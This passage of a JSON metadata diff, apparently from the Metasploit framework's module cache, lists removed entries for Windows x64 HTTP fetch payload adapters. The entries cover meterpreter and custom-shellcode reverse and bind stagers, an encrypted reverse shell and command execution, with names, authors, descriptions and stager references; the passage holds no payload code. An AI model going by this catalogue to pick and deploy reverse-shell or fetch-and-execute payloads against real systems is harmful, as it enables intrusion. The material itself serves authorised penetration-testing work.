"/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/http/x64/custom/bind_tcp_rc4": { - "name": "HTTP Fetch, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/http/x64/custom/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/http/x64/custom/bind_tcp_uuid": { - "name": "HTTP Fetch, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/http/x64/custom/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/http/x64/custom/reverse_http": { - "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/http/x64/custom/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/reverse_http", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/http/x64/custom/reverse_https": { - "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/http/x64/custom/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "hdm ", - "agix", - "rwincey" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/reverse_https", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/http/x64/custom/reverse_named_pipe": { - "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/http/x64/custom/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/http/x64/custom/reverse_tcp": { - "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/http/x64/custom/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/http/x64/custom/reverse_tcp_rc4": { - "name": "HTTP Fetch, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/http/x64/custom/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/http/x64/custom/reverse_tcp_uuid": { - "name": "HTTP Fetch, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/http/x64/custom/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/http/x64/custom/reverse_winhttp": { - "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/http/x64/custom/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/http/x64/custom/reverse_winhttps": { - "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/http/x64/custom/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/http/x64/encrypted_shell/reverse_tcp": { - "name": "HTTP Fetch, Windows Command Shell, Encrypted Reverse TCP Stager", - "fullname": "payload/cmd/windows/http/x64/encrypted_shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Matt Graeber", - "Shelby Pace" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/encrypted_shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/encrypted_shell/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/encrypted_shell", - "stager_refname": "windows/x64/encrypted_reverse_tcp" - }, - "payload_cmd/windows/http/x64/encrypted_shell_reverse_tcp": { - "name": "HTTP Fetch, Windows Encrypted Reverse Shell", - "fullname": "payload/cmd/windows/http/x64/encrypted_shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Matt Graeber", - "Shelby Pace" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn an encrypted command shell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/encrypted_shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/encrypted_shell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/http/x64/exec": { - "name": "HTTP Fetch, Windows x64 Execute Command", - "fullname": "payload/cmd/windows/http/x64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nExecute an arbitrary command (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/exec", - "staged": false - }, - "payload_cmd/windows/http/x64/loadlibrary": { - "name": "HTTP Fetch, Windows x64 LoadLibrary Path", - "fullname": "payload/cmd/windows/http/x64/loadlibrary", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "scriptjunkie", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nLoad an arbitrary x64 library path", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/loadlibrary", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/loadlibrary", - "staged": false - }, - "payload_cmd/windows/http/x64/messagebox": { - "name": "HTTP Fetch, Windows MessageBox x64", - "fullname": "payload/cmd/windows/http/x64/messagebox", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "pasta " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a dialog via MessageBox using a customizable title, text & icon", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/messagebox", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/messagebox", - "staged": false - }, - "payload_cmd/windows/http/x64/meterpreter/bind_ipv6_tcp": { - "name": "HTTP Fetch, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/http/x64/meterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/http/x64/meterpreter/bind_ipv6_tcp_uuid": { - "name": "HTTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/http/x64/meterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/http/x64/meterpreter/bind_named_pipe": { - "name": "HTTP Fetch, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/http/x64/meterpreter/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/http/x64/meterpreter/bind_tcp": { - "name": "HTTP Fetch, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/http/x64/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/http/x64/meterpreter/bind_tcp_rc4": { - "name": "HTTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/http/x64/meterpreter/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/http/x64/meterpreter/bind_tcp_uuid": { - "name": "HTTP Fetch, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/http/x64/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/http/x64/meterpreter/reverse_http": { - "name": "HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_http", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/http/x64/meterpreter/reverse_https": { - "name": "HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "agix", - "rwincey" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_https", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/http/x64/meterpreter/reverse_named_pipe": { - "name": "HTTP Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/http/x64/meterpreter/reverse_tcp": { - "name": "HTTP Fetch, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp" - }, - 